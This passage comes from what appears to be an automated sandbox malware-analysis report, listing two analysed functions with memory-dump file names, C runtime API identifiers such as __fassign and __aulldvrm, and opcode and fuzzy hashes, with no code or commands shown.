                      • Instruction Fuzzy Hash: B0412971600204AFDB20DF69CD85FAE77ADEF88720F20CA45F9599B2D1D734E94187A0
                      Function 0098FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: __fassign
                      • String ID:
                      • API String ID: 3965848254-0
                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                      • Instruction ID: dcec933bcb0858312c8e691b9d01a731636981f80a051a1de2d584206f4bafbf
                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                      • Instruction Fuzzy Hash: EC918D31D0020AEBDF24EF98C8556EEB7B8FF95314F20947AD441EB2A2E7344A41CB91
                      Function 00A05CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: $$0
                      • API String ID: 1302938615-389342756
                      • Opcode ID: 018af83cb2090d3acd3e5c30d54a6c4e7221cbcb49a7b8b3583c3dec23f3d3db
                      • Instruction ID: 88b5d16673ebcde9c426368010386ee4645e78bc9fa051017ffda9f8225bc509
                      • Opcode Fuzzy Hash: 018af83cb2090d3acd3e5c30d54a6c4e7221cbcb49a7b8b3583c3dec23f3d3db
                      • Instruction Fuzzy Hash: F9916930D04A8EAEDF24CFB9E4453AFBBB1AF41310F1446AAD8A1A72D1C3748A41CF50